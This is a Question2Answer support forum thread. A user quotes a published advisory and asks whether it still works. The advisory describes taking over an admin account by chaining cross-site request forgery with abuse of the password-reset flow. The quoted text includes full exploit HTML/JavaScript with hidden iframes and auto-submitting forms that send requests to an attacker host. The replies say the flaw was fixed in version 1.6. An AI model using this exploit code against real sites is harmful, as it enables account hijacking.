Welcome to the Question2Answer Q&A. There's also a demo if you just want to try it out.
+3 votes
5.8k views
in Q2A Core by
Hi,
 
found this article "Exploit for stealing admin's account in Question2Answer" 
 
 
Is this still a problem? Don't understand how this works, or if this works:
 
Here is exploit for stealing admin's account in Question2Answer. This exploit uses Cross-Site Request Forgery vulnerability at http://site/account and Insufficient Anti-automation vulnerabilities at http://site/forgot and http://site/reset, which I've described in the second advisory about Question2Answer (http://websecurity.com.ua/6192/). 
 
 
It will work in all affected versions of Question2Answer (and second part of the attack will work at default settings). If the admin of the target site has changed default settings and setup captcha at http://site/forgot, then server-side part of the attack can be done manually after conducting CSRF attack. 
 
Client-side part of exploit do the next (code provided bellow): 
 
1. Changes e-mail of the user or admin via CSRF. 
2. Start server-side part of exploit via request to attack.php. 
 
Server-side part of exploit (attack.php) do the next (algorithm): 
 
After receiving the signal from client-side part of exploit, attack.php do the next: 
 
1. Send POST request to http://site/forgot: 
 
<body onLoad="document.hack.submit()"> 
<form name="hack" action="http://site/forgot" method="post"> 
<input type="hidden" name="emailhandle" value="email@attacker.com"> 
<input type="hidden" name="doforgot" value="1"> 
</form> 
</body> 
 
2. Check mailbox for letter with the code: 
 
Code: 4f84yl1d 
 
This line contains code for resetting password. 
 
3. Send GET request to http://site/reset with this code: 
 
http://site/reset&c=4f84yl1d&e=email%40attacker.com 
 
4. New password is sent to attacker's e-mail. 
 
Code of client-side exploit for stealing admin's account in Question2Answer: 
 
<html> 
<head> 
<title>Exploit for stealing admin's account in Question2Answer. Made by MustLive. http://websecurity.com.ua</title> 
</head> 
<body onLoad="StartCSRF()"> 
<script> 
function StartCSRF() { 
for (var i=1;i<=2;i++) { 
 var ifr = document.createElement("iframe"); 
 ifr.setAttribute('name', 'csrf'+i); 
 ifr.setAttribute('width', '0'); 
 ifr.setAttribute('height', '0'); 
 document.body.appendChild(ifr); 
CSRF1(); 
setTimeout(CSRF2,1000); 
function CSRF1() { 
window.frames["csrf1"].document.body.innerHTML = '<form name="hack" action="http://site/account" method="post">\n<input type="hidden" name="handle" value="test">\n<input type="hidden" name="email" value="email@attacker.com">\n<input type="hidden" name="messages" value="1">\n<input type="hidden" name="mailings" value="1">\n<input type="hidden" name="field_1" value="test">\n<input type="hidden" name="field_2" value="test">\n<input type="hidden" name="field_3" value="test">\n<input type="hidden" name="dosaveprofile" value="1">\n</form>'; 
window.frames["csrf1"].document.hack.submit(); 
function CSRF2() { 
window.frames["csrf2"].document.body.innerHTML = '<form name="hack" action="http://attacker.com/attack.php" method="post">\n<input type="hidden" name="do" value="1">\n</form>'; 
window.frames["csrf2"].document.hack.submit(); 
</script> 
</body> 
</html> 

3 Answers

+1 vote
by
as I remember Q2A is protected against CSRF since V1.6 beta and if you are using latest version you will be safe.
+1 vote
by

This has been fixed with: Version 1.6 beta 1 (changelog)

I once suggested a workaround for people who do not want or cannot upgrade: http://www.question2answer.org/qa/22722/exploits-the-admin-can-put-htpasswd-and-htaccess-admin-folder (however, only protects the admin)

Greetings,
Kai

+1 vote
by

The others are correct, this has been fixed in 1.6. If you are using an earlier version you should upgrade to the latest verison (1.6.3) asap.

Also, note that this was an obscure and difficult-to-accomplish exploit. It required a user first visited the attacker's site which submits a form to change the email on account. That in itself requires knowledge of a specific site (the user might not have an account there) and requires the user to be logged in.

...